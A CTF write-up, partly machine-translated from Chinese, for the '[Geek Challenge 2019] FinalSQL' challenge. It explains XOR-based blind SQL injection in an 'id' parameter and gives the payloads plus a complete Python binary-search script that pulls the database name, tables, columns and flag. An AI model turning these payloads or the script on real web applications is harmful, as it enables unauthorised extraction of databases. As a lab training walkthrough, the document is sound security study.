[Geek Challenge 2019]FinalSQL

[极客大挑战 2019]FinalSQL

依次点击5个页面

Go to the last page to find the prompt to try No6个页面,观察到url中的id,输入6得到

有参数,尝试单引号

提示error 那么应该存在sql注入,Try Eternal True
There must be a filter,fuzz一波：

filter a lot,但是异或^没被过滤,And there is no error page,Then it should be the blinds
Use the XOR feature：相同为0 不同为1 测试
利用id=0^1为NO! Not this! Click others~~~ id=1^1为ERROR！！！to make blind judgments


Write blast scripts,参考这位佬的：[极客大挑战 2019]FinalSQL

1.Blast the database name core statement：0^(ascii(substr((select(database())),"+str(i)+",1))>"+str(mid)+")

Blast database named geek

2.Blast the table name core statement：0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(i)+",1))>"+str(mid)+")

爆破出表名为F1naI1y,Flaaaaag

3.爆破字段名 核心语句：0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),"+str(i)+",1))>"+str(mid)+")

F1naI1y表列名为id username password

0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),"+str(i)+",1))>"+str(mid)+")

Flaaaaag表字段为id fl4gawsl
猜测flag在fl4gawsl里

4.爆破flag 核心语句：0^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),"+str(i)+",1))>"+str(mid)+")

flag不在此处,query another tablepassword字段

找到flag

完整脚本代码：

import requests

target = "http://f394d9ca-2bcb-4014-bf77-82cd9e2a9963.node4.buuoj.cn:81/search.php"

def getDataBase():          #获取数据库名
    database_name = ""
    for i in range(1,1000):     #注意是从1开始,substrThe function truncates from the first character
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:       #二分法
            params={
    
                "id":"0^(ascii(substr((select(database())),"+str(i)+",1))>"+str(mid)+")" #注意select(database())要用()包裹起来
            }
            r = requests.get(url=target,params=params)
            if "others" in r.text:      #True to indicate that the character is presentasciiThe back half of the table
                low = mid+1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:
            break
        database_name += chr(mid)   #将ascii码转换为字符
    print("数据库名：" + database_name)


def getTable():     #获取表名
    column_name=""
    for i in range(1,1000):
        low = 32
        high = 127
        mid = (low+high)//2
        while low<high:
            params = {
    
                "id": "0^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target,params=params)
            if "others" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:
            break
        column_name += chr(mid)
    print("表名为："+column_name)


def getColumn():        #获取列名
    column_name = ""
    for i in range(1,250):
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:
            params = {
    
                "id": "0^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if 'others' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if low <= 32 or high >= 127:
            break
        column_name += chr(mid)
    print("列名为：" + column_name)


def getFlag():	#获取flag
    flag = ""
    for i in range(1,1000):
        low = 32
        high = 127
        mid = (low+high)//2
        while low < high:
            params = {
    
                "id" : "0^(ascii(substr((select(group_concat(password))from(F1naI1y)),"+str(i)+",1))>"+str(mid)+")"
            }
            r = requests.get(url=target, params=params)
            if 'others' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low+high)//2
        if low <= 32 or high >= 127:
            break
        flag += chr(mid)
    print("flag:" + flag)


getDataBase()
getTable()
getColumn()
getFlag()